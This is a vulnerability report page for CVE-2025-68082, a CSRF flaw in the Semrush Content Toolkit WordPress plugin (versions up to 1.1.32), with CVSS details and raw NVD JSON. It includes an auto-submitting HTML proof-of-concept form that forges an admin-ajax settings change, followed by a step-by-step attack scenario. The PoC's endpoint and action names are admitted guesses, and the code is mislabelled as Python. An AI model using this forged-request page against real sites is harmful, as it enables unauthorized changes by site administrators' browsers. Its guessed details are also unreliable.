Security Vulnerability Report
中文
CVE-2025-68082 CVSS 5.4 MEDIUM

CVE-2025-68082

Published: 2025-12-16 09:16:03
Last Modified: 2026-04-27 19:16:25
Source: [email protected]

Description

Cross-Site Request Forgery (CSRF) vulnerability in SEMrush CY LTD Semrush Content Toolkit semrush-contentshake allows Cross Site Request Forgery.This issue affects Semrush Content Toolkit: from n/a through <= 1.1.32.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Semrush Content Toolkit (WordPress插件) <= 1.1.32

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-68082 --> <!-- This PoC demonstrates the CSRF vulnerability in Semrush Content Toolkit --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-68082</title> </head> <body> <h1>CSRF PoC for Semrush Content Toolkit</h1> <p>This demonstrates the CSRF vulnerability in WordPress Semrush Content Toolkit plugin <= 1.1.32</p> <!-- Example: Forging a request to plugin's settings or content manipulation endpoint --> <form id="csrfForm" action="[TARGET_WORDPRESS_SITE]/wp-admin/admin-ajax.php" method="POST"> <!-- Example action - actual vulnerable endpoints need to be identified --> <input type="hidden" name="action" value="semrush_contentshake_save_settings"> <input type="hidden" name="settings[some_setting]" value="malicious_value"> <input type="hidden" name="security" value="[ANY_VALUE]"> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the attack form has been submitted.</p> <p><strong>Note:</strong> This is a demonstration. Replace [TARGET_WORDPRESS_SITE] with actual target URL.</p> <p><strong>Note:</strong> Identify actual vulnerable endpoints through code review of the plugin source.</p> </body> </html> <!-- Attack Scenario: 1. Attacker identifies a WordPress site using Semrush Content Toolkit plugin <= 1.1.32 2. Attacker analyzes plugin's AJAX endpoints that lack CSRF protection 3. Attacker creates malicious page with forged request 4. Attacker tricks authenticated admin into visiting the page 5. Browser automatically sends request with admin's cookies 6. Plugin processes the request without proper CSRF validation 7. Attacker's malicious action is executed successfully -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68082", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:16:03.223", "lastModified": "2026-04-27T19:16:24.973", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in SEMrush CY LTD Semrush Content Toolkit semrush-contentshake allows Cross Site Request Forgery.This issue affects Semrush Content Toolkit: from n/a through <= 1.1.32."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/semrush-contentshake/vulnerability/wordpress-semrush-content-toolkit-plugin-1-1-32-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.